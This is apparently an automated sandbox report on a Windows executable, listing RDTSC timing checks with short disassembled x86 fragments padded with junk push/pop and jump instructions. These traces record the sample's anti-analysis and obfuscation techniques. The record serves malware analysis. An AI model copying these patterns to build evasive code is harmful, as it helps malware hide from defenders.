              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311A4A second address: 311A69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F4668B9A730h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311B97 second address: 311B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311E84 second address: 311E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4668B9A726h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 ja 00007F4668B9A726h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311E9B second address: 311EAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Dh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31214D second address: 31215D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4668B9A726h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31215D second address: 312161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31539A second address: 3153A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3153A0 second address: 3153A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3153A5 second address: 3153BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4668B9A733h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3153BC second address: 3153C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3153C2 second address: 3153F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4668B9A739h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4668B9A730h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3153F7 second address: 315415 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F466925DD96h 0x00000008 jmp 00007F466925DDA4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 315415 second address: 315426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4668B9A72Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316BCF second address: 316BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316BD7 second address: 316BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 319A46 second address: 319A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31AE84 second address: 31AE88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400317 second address: 5400365 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F466925DD9Bh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 push esi 0x00000012 mov al, bh 0x00000014 pop esi 0x00000015 pushfd 0x00000016 jmp 00007F466925DD9Dh 0x0000001b xor ax, 0E26h 0x00000020 jmp 00007F466925DDA1h 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400365 second address: 540036B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540036B second address: 54003A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DDA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d jmp 00007F466925DD9Eh 0x00000012 movzx ecx, di 0x00000015 popad 0x00000016 mov ecx, dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54003A0 second address: 54003A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54003A4 second address: 54003A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54003A8 second address: 54003AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54305D0 second address: 54305D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54305D4 second address: 54305EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A733h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54305EB second address: 54305F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54305F1 second address: 54305F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54305F5 second address: 5430649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F466925DDA6h 0x00000012 xchg eax, ecx 0x00000013 pushad 0x00000014 mov ax, 1F1Dh 0x00000018 push esi 0x00000019 mov di, 658Ch 0x0000001d pop edi 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 jmp 00007F466925DDA1h 0x00000026 mov cx, C7A7h 0x0000002a popad 0x0000002b xchg eax, ecx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430649 second address: 543064D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430748 second address: 543074E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543074E second address: 5430752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430752 second address: 54307BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a pushad 0x0000000b mov ch, A0h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F466925DD9Bh 0x00000014 sub eax, 36C3593Eh 0x0000001a jmp 00007F466925DDA9h 0x0000001f popfd 0x00000020 movzx esi, bx 0x00000023 popad 0x00000024 popad 0x00000025 je 00007F466925DDEEh 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push esi 0x0000002f pop edx 0x00000030 pushfd 0x00000031 jmp 00007F466925DDA0h 0x00000036 sbb cx, AD68h 0x0000003b jmp 00007F466925DD9Bh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420174 second address: 5420197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4668B9A738h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420197 second address: 54201A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54201A6 second address: 54201BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4668B9A734h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54201BE second address: 54201C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54201C2 second address: 5420205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4668B9A72Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F4668B9A730h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4668B9A737h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420205 second address: 54202B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push FFFFFFFEh 0x0000000d pushad 0x0000000e mov ax, 3889h 0x00000012 call 00007F466925DDA6h 0x00000017 jmp 00007F466925DDA2h 0x0000001c pop eax 0x0000001d popad 0x0000001e push 3F834540h 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F466925DD9Ch 0x0000002a xor eax, 3B921638h 0x00000030 jmp 00007F466925DD9Bh 0x00000035 popfd 0x00000036 popad 0x00000037 xor dword ptr [esp], 4A2DDB08h 0x0000003e jmp 00007F466925DDA2h 0x00000043 push 06F3910Bh 0x00000048 pushad 0x00000049 movsx edi, cx 0x0000004c mov bh, cl 0x0000004e popad 0x0000004f xor dword ptr [esp], 735ABA7Bh 0x00000056 pushad 0x00000057 mov edx, 59002074h 0x0000005c popad 0x0000005d mov eax, dword ptr fs:[00000000h] 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F466925DDA5h 0x0000006a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54202B7 second address: 542034D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A731h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F4668B9A72Ch 0x00000011 sbb esi, 61A88488h 0x00000017 jmp 00007F4668B9A72Bh 0x0000001c popfd 0x0000001d call 00007F4668B9A738h 0x00000022 mov dl, cl 0x00000024 pop ebx 0x00000025 popad 0x00000026 push eax 0x00000027 pushad 0x00000028 mov esi, ebx 0x0000002a pushfd 0x0000002b jmp 00007F4668B9A72Fh 0x00000030 or esi, 3A8AFE2Eh 0x00000036 jmp 00007F4668B9A739h 0x0000003b popfd 0x0000003c popad 0x0000003d nop 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 call 00007F4668B9A72Ah 0x00000046 pop eax 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542034D second address: 5420369 instructions: 0x00000000 rdtsc 0x00000002 call 00007F466925DD9Bh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a movsx ebx, ax 0x0000000d popad 0x0000000e sub esp, 18h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 mov ebx, esi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420369 second address: 5420379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, 45FAh 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420379 second address: 542037D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542037D second address: 5420381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420381 second address: 5420387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420387 second address: 542038E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542038E second address: 542040A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a pushad 0x0000000b mov bh, cl 0x0000000d pushad 0x0000000e jmp 00007F466925DD9Bh 0x00000013 jmp 00007F466925DDA8h 0x00000018 popad 0x00000019 popad 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F466925DD9Dh 0x00000024 jmp 00007F466925DD9Bh 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F466925DDA8h 0x00000030 adc si, A858h 0x00000035 jmp 00007F466925DD9Bh 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542040A second address: 5420410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420410 second address: 5420414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420414 second address: 542042C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4668B9A72Dh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542042C second address: 5420432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420432 second address: 5420441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420441 second address: 5420445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420445 second address: 5420449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420449 second address: 542044F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542044F second address: 5420454 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420454 second address: 5420486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F466925DD9Fh 0x0000000a jmp 00007F466925DDA3h 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 xchg eax, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420486 second address: 54204A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A737h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54204A1 second address: 5420564 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DDA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F466925DDA1h 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F466925DD9Ch 0x00000017 sbb cl, 00000068h 0x0000001a jmp 00007F466925DD9Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov eax, dword ptr [75AF4538h] 0x00000026 pushad 0x00000027 jmp 00007F466925DDA0h 0x0000002c mov ch, 46h 0x0000002e popad 0x0000002f xor dword ptr [ebp-08h], eax 0x00000032 pushad 0x00000033 mov ch, bh 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F466925DDA1h 0x0000003c jmp 00007F466925DD9Bh 0x00000041 popfd 0x00000042 popad 0x00000043 popad 0x00000044 xor eax, ebp 0x00000046 jmp 00007F466925DD9Fh 0x0000004b nop 0x0000004c jmp 00007F466925DDA6h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 mov ecx, 1E596793h 0x0000005a mov dx, ax 0x0000005d popad 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420564 second address: 542056A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542056A second address: 542056E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542056E second address: 54205BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A737h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f jmp 00007F4668B9A730h 0x00000014 popad 0x00000015 lea eax, dword ptr [ebp-10h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4668B9A737h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54205BC second address: 54205E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F466925DDA9h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54205E6 second address: 5420602 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A731h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-18h], esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420602 second address: 5420608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420608 second address: 542060C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542060C second address: 5420630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000018h] 0x0000000e pushad 0x0000000f mov ax, 67E5h 0x00000013 mov edi, esi 0x00000015 popad 0x00000016 mov ecx, dword ptr [eax+00000FDCh] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov dh, B3h 0x00000021 push ecx 0x00000022 pop ebx 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420630 second address: 5420679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A737h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b jmp 00007F4668B9A736h 0x00000010 jns 00007F4668B9A75Dh 0x00000016 pushad 0x00000017 mov cl, C0h 0x00000019 mov dx, 951Eh 0x0000001d popad 0x0000001e add eax, ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420679 second address: 542067D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542067D second address: 5420683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420683 second address: 54206BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DDA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F466925DDA8h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54206BF second address: 54206C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54206C3 second address: 54206C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54206C9 second address: 54206CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54206CF second address: 54206D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54206D3 second address: 54206E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54206E3 second address: 54206E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54206E7 second address: 54206EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54206EB second address: 54206F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54206F1 second address: 54206F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54206F7 second address: 54206FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410404 second address: 5410455 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F4668B9A736h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4668B9A72Ch 0x00000018 sub ax, 6078h 0x0000001d jmp 00007F4668B9A72Bh 0x00000022 popfd 0x00000023 mov dx, ax 0x00000026 popad 0x00000027 mov edi, esi 0x00000029 popad 0x0000002a sub esp, 2Ch 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 movzx eax, dx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410455 second address: 54104B3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F466925DD9Fh 0x00000008 xor si, 84EEh 0x0000000d jmp 00007F466925DDA9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jmp 00007F466925DDA0h 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F466925DDA7h 0x00000023 rdtsc
